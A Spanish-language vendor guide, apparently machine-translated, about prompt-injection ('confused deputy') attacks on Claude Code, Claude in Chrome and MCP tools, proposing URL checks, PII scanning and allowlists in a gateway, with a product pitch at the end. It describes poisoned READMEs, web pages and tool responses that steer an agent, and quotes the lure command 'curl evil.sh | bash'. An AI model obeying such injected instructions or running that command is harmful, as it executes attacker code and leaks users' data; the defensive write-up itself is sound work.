Ir al contenido
Guide

Matriz de auditoría adjunta de Claude confundido: 4 puntos ciegos, 3 barreras de seguridad

| 8 min read

Cuatro equipos de investigación publicaron los hallazgos de Claude sobre la inyección rápida entre el 6 y el 7 de mayo de 2026. Una matriz de auditoría que asigna cada punto ciego a una barandilla de concreto (verificación de URL, escaneo de PII, lista de permitidos) que puede enviar esta semana.

Security audit checklist representing Claude confused-deputy guardrails
Photo by Towfiqu barbhuiya on Unsplash

Entre el 6 y el 7 de mayo de 2026, cuatro equipos de investigación separados publicaron hallazgos sobre Claude Prompt. inyección. La mayor parte de la cobertura los trató como tres historias diferentes. Son la misma historia: un Problema adjunto confuso donde Claude ejecuta acciones en nombre de un atacante que controla contenido que no es de confianza en su ventana contextual.

Un archivo README en un repositorio clonado puede ejecutar comandos de shell a través de Claude Code. Una página web en Claude en Chrome puede convencer al agente para que busque las URL del atacante. La respuesta de una herramienta MCP puede inyectar instrucciones que obedece la siguiente llamada a la herramienta. La modelo está haciendo lo que le dijeron; el problema es el modelo No puedo decir quién está contando.

Defensas parciales de las naves antrópicas (solicitudes de permiso en el Código Claude, confirmaciones de acción en Claude en Chrome). El resto es tuyo. Aquí está la matriz de auditoría que asigna cada punto ciego a un barandilla de concreto y una verificación de API con una sola llamada que puede ingresar a su puerta de enlace MCP hoy.

Los cuatro puntos ciegos

Superficie Vector de ataque que corre Barandilla nativa
Código Claude README envenenado, paquete postinstall, o git confirmar el cuerpo Comando Shell, escritura de archivos, git push Solicitud de permiso
claude en cromo Instrucciones de la página web disfrazadas de solicitudes de usuarios Haga clic, envíe el formulario, siga el enlace Confirmación de acción
Escritorio Claude + MCP La respuesta de la herramienta lleva instrucciones para la próxima llamada. Llamada encadenada a herramienta MCP, lectura de archivos, recuperación de red Diálogo de consentimiento de herramienta
API tool_use Cadena que no es de confianza dentro de un bloque de resultados de herramienta Lo que decida el próximo turno Ninguno por defecto

Cada medida de seguridad nativa capta el caso obvio (un comando de shell que el usuario no solicitó) y omite el sutil (un rizo "inofensivo" para un host similar que el usuario nunca ha visto). La solución Es una defensa en profundidad en la capa de herramientas, no en la capa de aviso.

Barandilla 1: phishing: verifique cada URL que toque el agente

La escalada de confusión más común es "visita esta URL y dime lo que dice". el La URL pertenece al atacante. Los datos que el agente lee a continuación ahora son su entrada. Ejecutar un phishing Verifique cada URL que el agente no vio en el mensaje de usuario original:

Un ejecutable sin formato alojado en una esencia anónima sin confirmación fija es un clásico cadena de ejecución de inyección rápida a shell. El veredicto llega en menos de 100 ms; almacenas en caché por Hash de URL durante 10 minutos; dejas caer llamadas a herramientas cuyo veredicto es cualquier cosa que no sea clean.

Guardrail 2: PII y escaneo secreto en cada respuesta de la herramienta MCP

La segunda escalada es el envenenamiento de la respuesta a las herramientas. Una herramienta MCP devuelve un blob JSON de 4 KB; en alguna parte en ese blob hay una cadena de instrucciones. Claude lee todo el blob y gana la instrucción. el El blob también puede filtrar credenciales recopiladas en otros lugares, que luego terminan en el razonamiento del modelo. seguimiento y sus registros de conversación.

Bloquee la respuesta de la herramienta para que no llegue al modelo si lleva credenciales activas. Redactar correos electrónicos y teléfonos a menos que el usuario los solicite. Trate a todos los servidores MCP como no confiables de forma predeterminada; tu No sé quién envenenó la fuente de datos ascendente.

Guardrail 3: listas permitidas de host duro y shell en la puerta de enlace

La tercera escalada es la que afecta a las empresas: un agente que silenciosamente amplía su propia alcance. Un archivo README convence a Claude Code para que se ejecute curl evil.sh | bash "para la configuración". un La página web convence a Claude en Chrome para que envíe un formulario en un dominio similar. Ambos ataques mueren. contra una lista de permitidos fija:

La lista de permitidos es aburrida. Aburrido es el punto. Cada acción que escapa de la lista de permitidos falla inmediatamente o muestra un mensaje que el usuario debe leer. El agente sigue siendo útil dentro del arenero e inofensivo fuera de él.

La puerta de enlace MCP de 60 líneas que lo conecta

Las tres barreras de seguridad residen en una función de middleware que se encuentra entre Claude y cada MCP. servidor. Extrae las URL de las respuestas de la herramienta, las compara con un conjunto de hosts confiables más un lista de sesiones permitidas, ejecuta un escaneo de PII y devuelve una decisión de bloque estructurado que la aplicación host puede surgirle al usuario:

El conjunto de hosts confiables contiene sus propias API. La lista de permitidos de la sesión comienza vacía y crece a medida que El usuario aprueba explícitamente los hosts durante la sesión. El almacenamiento en caché mantiene el cheque efectivamente libre durante repetir URL (piense en paginación, reintentos, la misma página de documentos en todas las llamadas a herramientas).

Si aún no puede ejecutar una puerta de enlace, utilice la versión económica: registre cada URL y cada comando de shell el agente le propone matrimonio a una tienda estructurada y le alerta sobre cualquier cosa que llegue a un host que usted no haya visitado. preautorizar. La detección sin prevención no supera a ninguna de las dos.

Dónde encaja esto en una postura de defensa en profundidad

La matriz de auditoría no reemplaza el propio trabajo de Anthropic. Es la capa que controlas. un división sensata:

  • Anthropic posee el modelo: robustez de inyección rápida, jerarquía de instrucciones entrenamiento, comportamiento de rechazo.
  • Eres dueño de la superficie de la herramienta: Validación de URL, depuración de PII, host y shell listas permitidas, inventario del servidor MCP.
  • Su IdP posee la identidad: tokens de corta duración para el agente, por sesión auditoría, separe las credenciales del usuario humano.

Omita cualquier capa y el siguiente informe del ayudante confundido incluirá su incidente. La investigación del 6 al 7 de mayo es una vista previa gratuita de lo que cada equipo necesita enviar antes de que se convierta en un ciclo de noticias trimestral.

Conclusiones clave

  • Cuatro puntos ciegos, una causa fundamental. Claude trata cada ficha como potencialmente portador de instrucciones. El contenido que no es de confianza en contexto es un vector de acción, no una lectura pasiva.
  • Verificación de phishing de URL en cada URL propuesta por la herramienta. Una llamada API, 100 ms, almacenado en caché. Elimina la cadena de escalada de inyección rápida más común.
  • Escaneo de PII en cada respuesta de la herramienta MCP. Bloquea la exfiltración de credenciales a través de La herramienta resulta en envenenamiento y mantiene los secretos fuera de los registros de conversación.
  • Listas de permitidos estrictos en la puerta de entrada. El comando Shell y las listas permitidas de host eliminan el escalada de "ampliación silenciosa del alcance". Aburrido, finito, eficaz.
  • División de defensa en profundidad. Anthropic es dueño del modelo, tú eres dueño de la superficie de la herramienta, su IdP posee la identidad. Salta una capa y la siguiente investigación te nombrará.

exhibiciones de botoi /v1/phishing/check, /v1/pii/detect, /v1/url-metadatay aproximadamente 200 puntos finales más de propósito único detrás de una clave API con 5 req/min gratis. Conéctelos a su puerta de enlace MCP o llámelos desde Claude Code a través de el servidor botoi MCP. Navega por el documentos interactivos para empezar.

FAQ

¿Cuál es el problema del diputado confundido de Claude?
Un ataque adjunto confuso ocurre cuando un proceso privilegiado (Claude Code, Claude en Chrome) ejecuta acciones en nombre de un atacante que controla parte de su entrada. Entre el 6 y el 7 de mayo de 2026, cuatro equipos de investigación publicaron hallazgos que muestran que se puede engañar a Claude para que ejecute comandos de shell, extraiga datos o visite URL de atacantes cuando contenido que no es de confianza (un archivo README, una página web, una respuesta de herramienta MCP) contiene instrucciones que parecen solicitudes de usuarios.
¿Qué superficies de Claude se ven afectadas?
Claude Code (agente CLI que lee archivos de repositorio), Claude en Chrome (agente de navegación que lee páginas web), Claude Desktop con servidores MCP (las respuestas de las herramientas pueden contener instrucciones) y la API cuando los resultados de tool_use contienen cadenas controladas por el atacante. La raíz del problema es la misma en los cuatro: Claude trata cada token en contexto como potencialmente portador de instrucciones.
¿Anthropic envía barandillas para esto?
Sí, parcialmente. Claude Code tiene un sistema de permisos para escritura de archivos y shells. Claude en Chrome tiene una capa de confirmación de acción. Ninguno de los dos impide que un atacante decidido encadene una inyección rápida con ingeniería social. La capa de defensa en profundidad es suya: valide cada URL que proponga el agente, analice cada respuesta de la herramienta en busca de IOC y limite el radio de explosión en la puerta de enlace API.
¿En qué se diferencia esto de una inyección rápida regular?
La inyección rápida clásica finaliza en el texto de salida. El diputado confundido termina en acción: se ejecuta un comando de shell, se recupera una URL, se activa un webhook, el dinero se mueve. La solución tiene que vivir donde ocurren las acciones (la capa de herramientas), no donde se genera el texto (el modelo). Es por eso que los proxies de seguridad y la validación de URL son más importantes que el endurecimiento rápido.
¿Cuál es el mínimo que debo agregar esta semana?
Tres cosas. Una verificación de phishing de URL antes de que el agente busque o vincule a cualquier dominio que no vio en el mensaje del usuario. Una PII y un análisis secreto de cada respuesta de la herramienta MCP antes de que entre en el contexto de Claude. Y una lista de permitidos estrictos de comandos de shell o hosts HTTP en la capa de puerta de enlace. Cada uno es una llamada API y un bloque de configuración.

Empieza a construir con botoi

150+ endpoints de API para consultas, procesamiento de texto, generacion de imagenes y utilidades para desarrolladores. Plan gratuito, sin tarjeta de credito.